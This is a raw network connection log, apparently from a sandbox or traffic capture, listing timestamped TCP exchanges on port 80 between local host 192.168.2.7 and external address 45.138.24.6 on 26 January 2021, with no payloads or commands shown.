Jan 26, 2021 19:45:18.537751913 CET	49781	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:18.539554119 CET	49781	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:18.588430882 CET	80	49781	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:19.741225004 CET	49782	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.190296888 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.244045973 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.248832941 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.249437094 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.339521885 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.383198023 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.383543015 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.383544922 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.383951902 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.384026051 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.384500980 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.384798050 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.384959936 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.385008097 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.385025978 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.500011921 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.503928900 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.553972006 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.554627895 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.603708982 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.603872061 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.603945017 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.604063034 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.669101954 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.669158936 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.669292927 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.669348955 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.669707060 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.669899940 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.720921993 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.721069098 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.721241951 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.721399069 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.770486116 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.770673037 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.851537943 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.851720095 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.851749897 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.852137089 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.902245998 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.902301073 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.902430058 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.902491093 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.902813911 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.904254913 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.977750063 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.978024006 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:51.978066921 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:51.978176117 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.027252913 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.027517080 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.076797962 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.076858044 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.076992989 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.077039003 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.135726929 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.135826111 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.135876894 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.135941029 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.136274099 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.136648893 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.185055017 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.185640097 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.186172009 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.186213017 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.235362053 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.235486031 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.235635042 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.235650063 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.235991955 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.236083984 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.308228016 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.308491945 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.357669115 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.358860970 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.408139944 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.408246994 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.408334970 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.450438023 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.462893963 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.462954998 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.463262081 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.508758068 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.515063047 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.515122890 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.515292883 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.566996098 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.567059040 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.567262888 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.567284107 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.613439083 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.639307022 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.639539003 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.639641047 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.685578108 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.689342022 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.689454079 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.689536095 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.689699888 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.740627050 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.741956949 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.795234919 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.795377970 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.843120098 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.844255924 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.893470049 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.893596888 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.893632889 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.893697023 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.956362963 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:52.956449986 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:52.956561089 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.007745981 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.013120890 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.013649940 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.013705015 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.058954954 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.067317963 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.067357063 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.067485094 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.117172956 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.138955116 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.139318943 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.139607906 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.192357063 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.199459076 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.199477911 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.199620008 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.250575066 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.250654936 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.250885963 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.250946999 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.251363993 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.251468897 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.317940950 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.318118095 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.378613949 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.378703117 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.384354115 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.384443998 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.482346058 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.482377052 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.482450962 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.482491970 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.549896955 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.550026894 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.601552010 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.604084969 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.653412104 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.653501034 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.653613091 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.653805971 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.653871059 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.702841043 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.703799963 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.703874111 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.704185009 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.704268932 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.754986048 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.755065918 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.806246996 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.806360960 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.831835032 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.831938982 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.881666899 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.881742001 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.881783962 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.881865978 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.930787086 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.930996895 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.931027889 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.976649046 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:53.980551958 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.980751038 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:53.980834007 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.028023005 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.032135963 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.032222033 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.032263994 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.081304073 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.081427097 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.081481934 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.130512953 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.130672932 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.130702019 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.179785967 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.181951046 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.182066917 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.232788086 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.232863903 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.399946928 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.402867079 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.452176094 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.452326059 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.501456022 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.501633883 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.501684904 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.503334045 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.550718069 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.551187992 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.552411079 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.601779938 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.602272034 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.602456093 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.602550030 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.651179075 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.651875973 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.652108908 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.652121067 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.701246977 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.701354027 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.701518059 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.701704025 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.750500917 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.750680923 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.750804901 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.750962973 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.800082922 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.800220013 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:54.851295948 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:54.851515055 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.007976055 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.009438038 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.060244083 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.060431957 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.111474037 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.111610889 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.111795902 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.111882925 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.161062956 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.161149979 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.161204100 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.210366011 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.210544109 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.210778952 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:55.210810900 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.211208105 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.211227894 CET	49785	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:55.260245085 CET	80	49785	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:56.818521023 CET	49788	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:56.867711067 CET	80	49788	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:56.869585991 CET	49788	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:56.869828939 CET	49788	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:56.960227013 CET	80	49788	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:57.552026033 CET	80	49788	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:57.552109957 CET	49788	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:57.552798033 CET	49788	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:57.602154970 CET	80	49788	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:57.888355017 CET	49789	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:57.940965891 CET	80	49789	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:57.941103935 CET	49789	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:57.941216946 CET	49789	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:57.941226006 CET	49789	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:58.036519051 CET	80	49789	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:58.532283068 CET	80	49789	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:58.532433033 CET	49789	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:58.532535076 CET	49789	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:58.581517935 CET	80	49789	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:58.598609924 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:58.647655964 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:58.647907972 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:58.647962093 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:58.740385056 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.113455057 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.113837957 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.113869905 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.114273071 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.114348888 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.114358902 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.114752054 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.114969969 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.115255117 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.116493940 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.224519014 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.224607944 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.274738073 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.274867058 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.323968887 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.324174881 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.324218035 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.324273109 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.373321056 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.373516083 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.373562098 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.373749018 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.373970985 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.374337912 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.423357010 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.423472881 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.423796892 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.423897982 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.472877026 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.474431992 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.523560047 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.523653984 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.523709059 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.523830891 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.572844028 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.573061943 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.573100090 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.573129892 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.573504925 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.573647022 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.622015953 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.622517109 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.622602940 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.622623920 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.671644926 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.672996044 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.722071886 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.722269058 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.722404003 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.722424984 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.771419048 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.771677971 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.771780014 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.771795034 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.772150993 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.772281885 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.820739985 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.820835114 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.821113110 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.821163893 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.870009899 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.870095968 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.870187998 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.870259047 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.870590925 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.870667934 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.919678926 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.920660019 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.920661926 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.920814991 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.969691992 CET	80	49790	45.138.24.6	192.168.2.7
Jan 26, 2021 19:45:59.969825983 CET	49790	80	192.168.2.7	45.138.24.6
Jan 26, 2021 19:45:59.969834089 CET	80	49790	45.138.24.6	192.168.2.7
